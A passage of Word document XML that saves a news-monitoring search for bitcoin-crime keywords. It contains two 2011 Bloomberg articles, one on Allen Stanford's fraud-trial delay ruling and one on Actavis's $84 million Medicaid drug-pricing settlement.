          <v:shape id="_x0000_i1061" type="#_x0000_t75" style="width:58.5pt;height:18.75pt" o:ole="">
            <v:imagedata r:id="rId47" o:title=""/>
          </v:shape>
          <w:control r:id="rId48" w:name="DefaultOcxName13" w:shapeid="_x0000_i1061"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="CDDAE6"/>
        <w:ind w:right="-5310"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="bottom"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>Мова запитів</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>Приклади</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:pStyle w:val="z-1"/>
      </w:pPr>
      <w:r>
        <w:t>Конец формы</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="386"/>
        <w:gridCol w:w="6727"/>
        <w:gridCol w:w="2242"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F854A0" w:rsidTr="00F854A0">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
            <w:pP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extent cx="247650" cy="133350"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="3" name="Рисунок 3" descr="https://online.infostream.ua/img/ico-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nline.infostream.ua/img/ico-24.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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DFE6EF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>bitcoin </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0000FF"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>crime </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t> criminal </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t> illegal </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t> illicit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t> laundering </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t> drugs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0000FF"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Silk~Road</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0000FF"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t> darknet </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t> cashout</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0000FF"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F854A0" w:rsidTr="00F854A0">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0">
            <w:pP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extent cx="247650" cy="133350"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2" name="Рисунок 2" descr="https://online.infostream.ua/img/ico-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nline.infostream.ua/img/ico-26.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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3750" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DFE6EF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Найдено документов - </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>212</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>, страница 1 из 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>Статистика слов:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ВIТСОIN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> - 2413, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>СRIМЕ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> - 936725, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>СRIМINАL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> - 672123, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ILLЕGАL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> - 550956, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ILLIСIТ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> - 37123, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>LАUNDЕRING</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> - 43464, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DRUGS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> - 440574, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>SILК</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> - 52650, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>RОАD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> - 1553548, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DАRКNЕТ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> - 215, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>САSНОUТ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> - 57,</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DFE6EF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="200025" cy="190500"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="1" name="Рисунок 1" descr="https://online.infostream.ua/img/ico-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nline.infostream.ua/img/ico-22.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Pr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId54" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="19"/>
                  <w:szCs w:val="19"/>
                </w:rPr>
                <w:t>Добавить канал</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Allen Stanford Loses Bid to Delay His Fraud Trial in January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29, 2011, 12:23 AM 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Perry Asks Court to Block Printing of Virginia Primary Ballots Allen StanfordБ─(tm)s Bid to Delay His January Fraud Trial Denied Allen Stanford Found Mentally Fit for Fraud Trial in January FBI Pulls Off Б─≤Perfect HedgeБ─(tm) to Nab New Insider Trading Class SEC Backs Lehman Brokerage in Barclays Dispute After Shortfall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Laurel Brubaker Calkins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 29 (Bloomberg) - R. Allen Stanford lost his bid for more time to prepare to face charges he led a $7 billion investment fraud scheme. Jury selection will begin in Houston federal court on Jan. 23.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case needs to be tried," U.S. District Judge David Hittner said in an eight-page ruling yesterday. "This trial will decide not just whether Stanford is guilty of the criminal charges, but also whether hundreds of millions of dollars of investor funds currently frozen may be forfeited and returned to his alleged victims."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Hittner ruled Dec. 22 that Stanford has sufficiently recovered from a head injury suffered in a jailhouse assault and an addiction to anxiety medications prescribed to him by prison doctors after the attack.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judge delayed Stanford's original trial date last January and ordered him into a prison rehabilitation program after finding Stanford's medical conditions had made him incompetent to understand the proceedings or assist his defense team. "Our ability to defend our client has been consistently limited by matters the court is well aware of," Ali Fazel, Stanford's lead lawyer, said in an e-mailed statement yesterday about the ruling. "We are now reviewing our options."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Flight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Stanford, 61, has been detained as a flight risk since his June 2009 indictment on charges he defrauded investors of more than $7 billion through allegedly bogus certificates of deposit at his Antiguan bank. The former financier has denied all wrongdoing.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Stanford's attorneys had asked to delay the trial until late April to give them more time to review millions of pages of company documents with Stanford. They argued they'd had only a few days to review documents with Stanford while he was clear- headed. They said they needed to search beyond the limited set of papers the government has identified as critical to the case.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accused's position is that this case is about the flow of money" through Antigua-based Stanford International Bank and more than 100 related Stanford companies scattered around the globe, Fazel said in a Dec. 27 court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the defense in this case does not merely require knowledge of one company as the government contends, but rather, depends upon knowledge of the finances and operations" of all the companies, Fazel said in the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Investors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who opposed a lengthy delay, said a four-to- six-week extension wasn't unreasonable given the time Stanford's lawyers had needed to devote to his recent competency hearing. They said further delay wasn't fair to thousands of Stanford investors, whose recovery of funds from Stanford's holdings is stalled until his criminal case is concluded.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Justice Department spokeswoman Laura Sweeney declined to comment on the ruling.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contends Stanford's bank operated as a Ponzi scheme, in which early investors were paid above-market interest rates with funds taken from later investors.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claim Stanford siphoned off more than $1 billion to fund a lavish lifestyle of private jets, yachts, multiple mansions and a private Caribbean island.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criminal case is U.S. v. Stanford, 09cr342, U.S. District Court, Southern District of Texas (Houston). The SEC case is Securities and Exchange Commission v. Stanford International Bank, 09cv298, U.S. District Court, Northern District of Texas (Dallas).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Mary Romano, Peter Blumberg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Laurel Brubaker Calkins in Houston at laurel@calkins.us.com.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Three Types of People to Fire Immediately Top B-School Stories of 2011 Where Greece Is Right and Germany Is Wrong Is It Time for Apple's Patent War to End?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It's Always Sunny in Silicon Valley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Three Types of People to Fire Immediately It's Always Sunny in Silicon Valley Where Greece Is Right and Germany Is Wrong You Deserve the Team You Get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Dividend Stocks' Asian Flavor Intel Prepares to Close Philippine Plant The $32,000 Startup How to Sell Your Invention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Most Expensive U.S. Homes Sold in 2011 Best Places to Launch a Career The Most Expensive Small Towns in America World's Most Expensive Cities 2011 America's 50 Best Cities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 Occupiers and Evicters Special Report Focus On Entrepreneurs, November 2011 Video Swiss Ski Resort Adapting to Strong Franc Slide Show Black Swans of 2011 Special Report Charlie Rose Talks to... Video Munster Says Apple Shares May Rise to $607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Corporate Fraud Micro Finance in India Technology in the Classroom Advertising in a Recession Religion in the Workplace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Fix This/Transportation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@BW on Twitter BW on Facebook Blogs EconoChat EuroCrisis Joshua Green on Politics Occupy Wall Street Small Business Technology [+] Rate this page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 Subscribe Now</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2011.12.29 14:35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-12-29/allen-stanford-loses-bid-to-delay-his-fraud-trial-in-january.html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Actavis to Pay $84 Million to End Medicaid Drug-Pricing Suit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29, 2011, 4:44 AM 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Ally Financial, Madoff, Actavis, Deutsche Bahn in Court News Verizon Wireless Probed by Justice Department Over Cable Deals Cameron Loses Appeal to Scuttle BP Gulf Spill Trial Plan BP, GE, Delphi Financial, Kynikos, Barclays in Court News AMR Allowed to Buy 32 Boeings, Reject Some Aircraft Leases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Cronin Fisk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Actavis statement in seventh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 28 (Bloomberg) - Two units of Actavis Group Hf will pay $84 million to settle a lawsuit over drug pricing, Texas officials said, less than half the amount an Austin jury said the company should pay.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 accused Actavis Mid-Atlantic LLC and Actavis Elizabeth LLC, subsidiaries of the Iceland-based company's U.S. division, of inflating billings to the Texas Medicaid program by falsely reporting drug prices. The state court jury in February ordered the units to pay the state $170 million.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settlement resolves that litigation, Texas Attorney General Greg Abbott said today in a statement. The settlement includes a $29.2 million recovery for the state's general fund, Abbott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"Actavis denies any and all wrongdoing, and denies that it has any liability relating to the Texas judgment," the company and the state said in the settlement agreement. The parties reached a settlement "to avoid the delay, uncertainty, inconvenience and expense of continuing the litigation."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is one of multiple claims by Texas and other states alleging that pharmaceutical companies inflated Medicaid billings for drugs through inaccurate price reporting.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Actavis suit was the only Texas claim to reach trial, Abbott said. His office has recovered almost $450 million from pharmaceutical companies in drug-pricing suits.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"Actavis is pleased to have resolved this matter and looks forward to providing continued access to our products to the more than 3 million Texans who rely on Medicaid for their medical coverage," Doug Boothe, chief executive officer of Activis Inc., the company's U.S. unit based in Morristown, New Jersey, said today in an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elected to settle this case rather than pursue an appeal of the jury's decision in order to secure this favorable outcome," Boothe said. "Actavis will continue to report our product pricing in a manner consistent with all applicable laws as well as the terms of this agreement."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State of Texas Ex. Rel. Ven-A-Care of the Florida Keys Inc., D- 1-GV-08-1566, Texas District Court, Travis County (Austin).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David E. Rovella, Charles Carter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Margaret Cronin Fisk in Detroit at mcfisk@bloomberg.net.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Three Types of People to Fire Immediately Top B-School Stories of 2011 Where Greece Is Right and Germany Is Wrong Is It Time for Apple's Patent War to End?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>It's Always Sunny in Silicon Valley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Where Greece Is Right and Germany Is Wrong It's Always Sunny in Silicon Valley Three Types of People to Fire Immediately Bitcoins: Currency of the Geeks You Deserve the Team You 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Intel Prepares to Close Philippine Plant The $32,000 Startup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Most Expensive U.S. Homes Sold in 2011 Best Places to Launch a Career The Most Expensive Small Towns in America America's 50 Best Cities World's Most Expensive Cities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 Occupiers and Evicters Special Report Focus On Entrepreneurs, November 2011 Video Swiss Ski Resort Adapting to Strong Franc Slide Show Black Swans of 2011 Special Report Charlie Rose Talks to... Video Munster Says Apple Shares May Rise to $607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Business-to-Business Marketing Marketing to Latinos Marketing to Moms Marketing to Women Obama's Stimulus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Fix This/Transportation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@BW on Twitter BW on Facebook Blogs EconoChat EuroCrisis Joshua Green on Politics Occupy Wall Street Small Business Technology [+] Rate this page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 Subscribe Now</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2011.12.29 12:35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
